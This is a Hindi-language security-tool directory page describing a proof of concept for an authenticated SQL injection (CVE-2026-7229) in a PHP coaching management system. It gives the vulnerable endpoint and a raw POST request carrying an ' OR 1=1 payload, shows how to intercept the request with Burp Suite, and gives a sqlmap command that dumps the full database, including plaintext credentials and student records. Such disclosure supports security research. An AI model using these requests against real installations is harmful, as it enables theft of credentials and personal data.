Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-7229-SQLI — प्रमाणित SQL इंजेक्शन के लिए प्रूफ ऑफ कॉन्सेप्ट Coaching Management System में, जो अस्वच्छित complaintreply पैरामीटर के माध्यम से डेटाबेस डंप का प्रदर्शन करता है। | Kitploit
उपकरण/GitHubGitHub/xmyronn/cve-2026-7229-sqli
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHubxmyronn/cve-2026-7229-sqli

CVE-2026-7229-SQLI

प्रमाणित SQL इंजेक्शन के लिए प्रूफ ऑफ कॉन्सेप्ट Coaching Management System में, जो अस्वच्छित complaintreply पैरामीटर के माध्यम से डेटाबेस डंप का प्रदर्शन करता है।

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

कोचिंग मैनेजमेंट सिस्टम में प्रमाणित SQL इंजेक्शन से डेटाबेस डंप संभव

विवरण

PHP में बने कोचिंग मैनेजमेंट सिस्टम में SQL इंजेक्शन की भेद्यता मौजूद है। एडमिन रिप्लाई कार्यक्षमता में complaintreply पैरामीटर को SQL क्वेरी में उपयोग करने से पहले उचित रूप से सैनिटाइज़ नहीं किया जाता है। एक प्रमाणित हमलावर (एडमिन) दुर्भावनापूर्ण SQL क्वेरी इंजेक्ट कर सकता है, जिससे पूर्ण डेटाबेस निष्कर्षण संभव हो जाता है।


भेद्यता विवरण

  • प्रकार: SQL इंजेक्शन (CWE-89: SQL कमांड में प्रयुक्त विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन)
  • प्रभाव: डेटाबेस डंप / क्रेडेंशियल प्रकटीकरण
  • प्रभावित फ़ाइल: /cims/modules/admin/reply.php
  • प्रभावित पैरामीटर: complaintreply
  • हमला वेक्टर: रिमोट, प्रमाणित (एडमिन)
  • डेटाबेस: MySQL (MariaDB)

विक्रेता

code-projects.org


उत्पाद

PHP में कोचिंग मैनेजमेंट सिस्टम https://code-projects.org/coaching-management-system-in-php-with-source-code/


संस्करण

अज्ञात (अप्रैल 2026 तक उपलब्ध नवीनतम संस्करण पर परीक्षण किया गया)


प्रूफ ऑफ कॉन्सेप्ट (सारांश)

  1. छात्र शिकायत दर्ज करता है Screenshot 2026-04-10 225755

  2. एडमिन शिकायत खोलता है और रिप्लाई सुविधा तक पहुँचता है

POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded

complaintreply=' OR 1=1-- -&submit=submit

Screenshot 2026-04-10 225808
  1. Burp Suite के माध्यम से अनुरोध इंटरसेप्ट करें Screenshot 2026-04-10 225821

  2. पेलोड इंजेक्ट करें:

    root@kitploit:~
    '
    
Screenshot 2026-04-10 225844
root@kitploit:~
SQL त्रुटि देखी गई

7. इंजेक्शन की पुष्टि करें:

root@kitploit:~
' OR 1=1-- -
Screenshot 2026-04-10 225900
  1. निम्न का उपयोग करके डेटाबेस डंप करें:

    root@kitploit:~
    sqlmap -r sqli.txt --dump
    
Screenshot 2026-04-10 235219

एरर-आधारित, बूलियन-आधारित और sqlmap का उपयोग करके स्वचालित शोषण के माध्यम से इंजेक्शन की पुष्टि की गई

प्रभाव

  • पूर्ण डेटाबेस निष्कर्षण संभव
  • प्लेनटेक्स्ट में संग्रहीत क्रेडेंशियल उजागर
  • एप्लिकेशन डेटा का पूर्ण समझौता
  • क्रेडेंशियल निष्कर्षण के माध्यम से प्रमाणीकरण बाईपास और विशेषाधिकार वृद्धि
  • उपयोगकर्ता तालिका (क्रेडेंशियल), छात्रों की PII, शिक्षक रिकॉर्ड और शिकायत इतिहास सहित पूर्ण डेटाबेस डंप प्राप्त किया गया।

गंभीरता: क्रिटिकल

टूल डाउनलोड करें